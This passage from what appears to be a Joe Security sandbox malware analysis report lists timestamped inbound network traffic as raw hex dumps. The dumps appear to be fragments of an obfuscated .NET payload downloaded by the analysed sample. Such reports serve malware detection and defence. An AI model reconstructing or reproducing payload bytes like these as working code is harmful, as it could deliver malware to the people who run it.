2022-02-22 14:30:32 UTC 36 IN Data Raw: 5a fe 0c 1e 00 fe 0c 16 00 58 4a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 59 5a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0c 00 00 58 fe 0e 1e 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd 44 ee ff ff fe 0c 05 00 fe 0c 1b 00 14 a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 dd 19 ee ff ff fe 0c 02 00 fe 0c 1b 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 0a 00 00 1b fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 10 00 fe 0c 1b 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd b8 ed ff ff fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 fe 0c 1e 00 fe 0c 16 00 58 4a 54 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c Data Ascii: ZXJ XXJYZ XXJXX YD X Y Yt YT Y YXJT
2022-02-22 14:30:32 UTC 37 IN Data Raw: 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 8b 00 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe Data Ascii: ' X8.X XXJ Y YX XXJX' X8X XXJ X X
2022-02-22 14:30:32 UTC 38 IN Data Raw: 00 5a 58 fe 0e 1e 00 dd d0 e3 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 04 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 18 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 25 00 fe 0c 1a 00 fe 0c 18 00 fe 0c 25 00 58 3c 16 00 00 00 fe Data Ascii: ZX ;O ;I' Y @0 TY X [ jX ZXXJ jX ZX XXJ%%X<
2022-02-22 14:30:32 UTC 40 IN Data Raw: 02 00 00 00 fe 09 02 00 a2 20 01 00 00 00 8d 03 00 00 01 fe 0e 27 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 1a 00 00 01 fe 0e 11 00 7f 5a 00 00 04 fe 0e 00 00 fe 0c 00 00 fe 0e 1e 00 fe 0c 1e 00 fe 0e 08 00 00 fe 0c 15 00 20 01 00 00 00 3b 2a 1f 00 00 fe 0c 1e 00 fe 0e 08 00 fe 0c 1e 00 46 fe 0e 17 00 fe 0c 1e 00 20 01 00 00 00 58 fe 0e 1e 00 fe 0c 17 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 17 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 17 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 ba 0a 00 00 20 06 00 00 00 fe 0c 17 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 6d 08 00 00 20 03 00 00 00 fe 0c 17 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 96 07 00 00 20 01 00 00 00 fe Data Ascii: ' Z ;*F X ? = ? =8 ? =8m ?d =8
2022-02-22 14:30:32 UTC 41 IN Data Raw: 02 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 19 00 fe 0c 19 00 fe 0e 20 00 00 fe 0c 20 00 20 ff ff ff ff 3b 9f 02 00 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a 20 00 00 00 00 40 89 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 ff ff ff ff 3b 62 00 00 00 fe 0c 13 00 fe 0c 09 00 9a 25 14 40 25 00 00 00 26 fe 0c 13 00 fe 0c 09 00 fe 0c 1c 00 fe 0c 09 00 a3 13 00 00 01 28 18 00 00 0a a2 fe 0c 13 00 fe 0c 09 00 9a 00 fe 0c 0c 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 20 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 01 00 00 00 Data Ascii: X (XXJ ; X XXJ @ X XXJ ;b%@%&((!: X (XXJ 8I X XXJ
2022-02-22 14:30:32 UTC 42 IN Data Raw: 00 dd 95 f5 ff ff fe 0c 05 00 fe 0c 1b 00 fe 0c 24 00 fe 0c 1e 00 fe 0c 16 00 58 4a 9a a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd 4e f5 ff ff fe 0c 05 00 fe 0c 1b 00 20 03 00 00 00 59 9a 74 1c 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 21 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 20 00 00 01 7e 18 00 00 04 fe 0c 1e 00 fe 0c 16 00 58 4a 97 29 2b 00 00 11 fe 0c 1b 00 20 03 00 00 00 59 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd dc f4 ff ff fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 0a 00 00 1b 7e 18 00 00 Data Ascii: $XJ X XN Yt Yt! Yt ~XJ)+ Y X Y Y Yt~
2022-02-22 14:30:32 UTC 44 IN Data Raw: 0f 00 38 6e ff ff ff fe 0c 20 00 20 01 00 00 00 59 fe 0e 0e 00 38 5b ff ff ff 00 fe 0e 1a 00 fe 0c 00 00 20 48 01 00 00 58 fe 0c 1a 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 fe 0c 12 00 3b bd 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 20 ff ff ff ff 3b 78 00 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 14 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 21 00 9e fe 0c 27 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 30 00 00 00 00 fe 0c 00 00 fe 0c 12 00 58 fe 0c 16 00 58 Data Ascii: 8n Y8[ HX ZX XXJ!!;X XXJ!! ;x!X XXJ !X XXJX!' X80XX
2022-02-22 14:30:32 UTC 45 IN Data Raw: 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 1a 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 09 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 Data Ascii: (!:X (XXJ8IX XXJ ; ;EX XXJ Y YX XXJX' X8.
2022-02-22 14:30:32 UTC 46 IN Data Raw: 00 fe 0c 19 00 58 fe 0c 16 00 58 4a fe 0e 19 00 38 42 fe ff ff 38 12 00 00 00 00 fe 0c 04 00 fe 0e 1e 00 20 ff ff ff ff fe 0e 04 00 00 00 dd 5d e5 ff ff fe 0c 1e 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 15 00 5a 58 fe 0e 1e 00 dd 2e e5 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd f0 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe Data Ascii: XXJ8B8 ]((%~a Y ZX. ;O ;I' Y @0 TY X [
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 41 of 65
2022-02-22 14:30:32 UTC 48 IN Data Raw: fe 0e 09 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 01 00 a2 7f 5b 00 00 04 fe 0e 03 00 fe 0c 03 00 fe 0e 07 00 fe 0c 07 00 fe 0e 05 00 00 fe 0c 00 00 20 01 00 00 00 3b d8 03 00 00 fe 0c 07 00 fe 0e 05 00 fe 0c 07 00 46 fe 0e 0a 00 fe 0c 07 00 20 01 00 00 00 58 fe 0e 07 00 fe 0c 0a 00 20 01 00 00 00 3f 69 01 00 00 fe 0c 0a 00 20 09 00 00 00 3d 5b 01 00 00 20 05 00 00 00 fe 0c 0a 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 50 02 00 00 20 02 00 00 00 fe 0c 0a 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 20 01 00 00 20 01 00 00 00 fe 0c 0a 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 f9 00 00 00 38 f3 00 00 00 38 ee 00 00 00 20 Data Ascii: [ ;F X ?i =[ ? =8P ?> =8 ? =888
2022-02-22 14:30:32 UTC 49 IN Data Raw: 64 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 16 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a8 00 00 00 38 a2 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 88 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 05 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 32 01 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 ca 00 00 00 38 30 00 00 00 38 2b 00 00 00 20 06 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 06 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 58 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 c7 fe ff ff fe 0c 0d 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 08 00 fe 0c 01 00 58 4a 9a a2 fe Data Ascii: d =8 ? =88 ? =88|8w ?> =82 ? =8808+ ? =8X888XJ
2022-02-22 14:30:32 UTC 50 IN Data Raw: 03 00 00 20 0d 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0d 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 89 03 00 00 38 30 00 00 00 38 2b 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 e4 03 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 71 fd ff ff fe 0c 09 00 fe 0c 04 00 fe 0c 07 00 fe 0c 05 00 fe 0c 10 00 58 4a 9a a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 fe 0c 05 00 20 08 00 00 00 58 fe 0e 05 00 38 2a fd ff ff fe 0c 09 00 fe 0c 04 00 14 a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 38 ff fc ff ff fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 09 00 fe 0c 04 00 20 02 00 00 00 59 9a fe 0c 09 00 fe 0c 04 00 20 01 Data Ascii: ? =8808+ ? =8888qXJ X X8* X8 Y Y
2022-02-22 14:30:32 UTC 52 IN Data Raw: 08 00 fe 0c 09 00 20 01 00 00 00 3f 8f 01 00 00 fe 0c 09 00 20 0a 00 00 00 3d 81 01 00 00 20 05 00 00 00 fe 0c 09 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 54 02 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 46 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 1f 01 00 00 38 19 01 00 00 38 14 01 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 41 01 00 00 38 ee 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 62 01 00 00 38 c8 00 00 00 38 c3 00 00 00 20 08 00 00 00 fe 0c 09 00 3f 64 00 00 00 20 08 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 9d 02 00 00 20 06 Data Ascii: ? = ? =8T ?> =8F ? =888 ? =8A8 ? =8b88 ?d =8
2022-02-22 14:30:32 UTC 53 IN Data Raw: 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 0d 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 0d 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 0d 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 12 07 00 00 20 06 00 00 00 fe 0c 0d 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 bc 04 00 00 20 03 00 00 00 fe 0c 0d 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 cc 03 00 00 20 01 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 5e 03 00 00 38 58 03 00 00 20 02 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 3e 03 00 00 38 32 03 00 00 38 2d 03 00 00 20 04 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 85 03 00 00 38 07 Data Ascii: X ? = ? =8 ? =8 ?d =8 ? =8^8X ? =8>828- ? =88
2022-02-22 14:30:32 UTC 54 IN Data Raw: 00 00 00 59 8f 04 00 00 01 e0 4a fe 01 54 fe 0c 04 00 fe 0c 10 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 51 fa ff ff fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 07 fa ff ff fe 0c 04 00 fe 0c 10 00 20 00 00 00 00 9c fe 0c 03 00 fe 0c 10 00 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 47 54 fe 0c 05 00 fe 0c 10 00 14 a2 fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 ab f9 ff ff fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 00 00 fe 0c 0a 00 Data Ascii: YJT Y Y8QXJ YJR X Y8 XJGT X X8 YJ
2022-02-22 14:30:32 UTC 58 IN Data Raw: 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 d2 f6 ff ff fe 0c 09 00 fe 0c 10 00 fe 0c 00 00 fe 0c 08 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 07 00 fe 0c 10 00 20 05 00 00 00 9c fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 8b f6 ff ff fe 0c 07 00 fe 0c 10 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 9a 74 0b 00 00 1b fe 0c 09 00 fe 0c 10 00 20 02 00 00 00 59 9a 74 0c 00 00 1b fe 0c 09 00 fe 0c 10 00 20 01 00 00 00 59 9a 74 0d 00 00 1b 7e 1e 00 00 04 fe 0c 08 00 fe 0c 0e 00 58 4a 97 29 36 00 00 11 a2 fe 0c 10 00 20 02 00 00 00 59 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 f6 f5 ff ff fe 0c 07 00 Data Ascii: X X8XJ X X8 Y Y Yt Yt Yt~XJ)6 Y X8
2022-02-22 14:30:32 UTC 62 IN Data Raw: 0f 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 7e f6 ff ff fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 34 f6 ff ff fe 0c 0b 00 fe 0c 0f 00 20 00 00 00 00 9c fe 0c 09 00 fe 0c 0f 00 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 01 00 fe 0c 0f00 14 a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d8 f5 ff ff fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a Data Ascii: Y Y8~XJ YJR X Y84 XJGT X X8 YJ XJ XXJYZ
2022-02-22 14:30:32 UTC 64 IN Data Raw: 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a 74 21 00 00 01 7e 1f 00 00 04 fe 0c 0c 00 fe 0c 03 00 58 4a 97 29 42 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 56 f2 ff ff fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 17 f2 ff ff fe 0c 0b 00 fe 0c 0f 00 20 05 00 00 00 9c fe 0c 01 00 fe 0c 0f 00 fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a 9a a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d0 f1 ff ff fe 0c 09 00 fe 0c 0f 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 01 00 fe 0c 0f 00 20 02 00 00 00 59 9a 74 23 00 00 01 fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 0b Data Ascii: Yt!~XJ)B X8VXJ Y X Y8 XJ X X8 Y Yt# YT
2022-02-22 14:30:32 UTC 68 IN Data Raw: 2a 2a fe 09 00 00 6f 36 00 00 0a 2a 2a fe 09 00 00 6f 37 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 38 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 28 39 00 00 0a 2a 2a fe 09 00 00 6f 3a 00 00 0a 2a 2a fe 09 00 00 6f 3b 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3c 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3d 00 00 0a 2a 00 13 30 03 00 dc 00 00 00 00 00 00 00 20 0c 00 00 00 8d 06 00 00 01 80 1f 00 00 04 7e 1f 00 00 04 20 00 00 00 00 fe 06 77 00 00 06 9b 7e 1f 00 00 04 20 01 00 00 00 fe 06 78 00 00 06 9b 7e 1f 00 00 04 20 02 00 00 00 fe 06 79 00 00 06 9b 7e 1f 00 00 04 20 03 00 00 00 fe 06 7a 00 00 06 9b 7e 1f 00 00 04 20 04 00 00 00 fe 06 7b 00 00 06 9b 7e 1f 00 00 04 20 05 00 00 00 fe 06 7c 00 00 06 9b 7e 1f 00 00 04 20 06 00 00 00 fe 06 7d 00 00 06 9b 7e 1f 00 Data Ascii: **o6**o7*:o8*:(9**o:**o;*:o<*:o=*0 ~ w~ x~ y~ z~ {~ |~ }~
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 42 of 65
2022-02-22 14:30:32 UTC 72 IN Data Raw: fe 0c 05 00 58 4a 9a a2 fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 46 fc ff ff fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a 75 1c 00 00 01 a2 fe 0c 03 00 fe 0c 01 00 20 01 00 00 00 59 20 05 00 00 00 9c 38 0a fc ff ff fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a a2 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 fe 0c 01 00 20 01 00 00 00 59 fe 0e 01 00 38 cb fb ff ff fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 08 00 fe 0c 01 00 fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a 9a a2 fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 84 fb ff ff fe 0c 08 00 fe 0c Data Ascii: XJ X X8F Y Yu Y 8XJ Y X Y8 XJ X X8
2022-02-22 14:30:32 UTC 76 IN Data Raw: 0c 04 00 3d 05 00 00 00 38 c2 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 04 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 04 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 0b 00 fe 0c 00 00 fe 0c 03 00 fe 0c 09 00 fe 0c 0a 00 58 4a 9a a2 fe 0c 08 00 fe 0c 00 00 20 05 00 00 00 9c fe 0c 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 d2 fe ff ff fe 0c 0b 00 fe 0c 00 00 20 01 00 00 00 59 9a 74 09 00 00 02 7e 2a 00 00 04 fe 0c 09 00 fe 0c 0a 00 58 4a 97 29 1e 00 00 11 fe 0c 00 00 20 01 00 00 00 59 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 88 fe ff ff 00 38 82 fe ff ff fe 0c 09 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0d 00 5a 58 fe 0e 09 00 Data Ascii: =88+ ? =888XJ X X8 Yt~*XJ) Y X88((%~a Y ZX
2022-02-22 14:30:32 UTC 80 IN Data Raw: 00 01 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 55 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd 53 f1 ff ff fe 0c 0e 00 fe 0c 27 00 fe 0c 10 00 58 4a fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a a2 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 dd 14 f1 ff ff fe 0c 2c 00 fe 0c 2a 00 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 02 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 58 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd c7 f0 ff ff fe 0c 2c 00 fe 0c 2a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a 74 05 00 00 01 7e 2b 00 00 Data Ascii: ~+'XJ)U* Y*' X'S'XJ* Y' X'* Y*,* *~+'XJ)* X*' X',* Y * Y* Yt~+
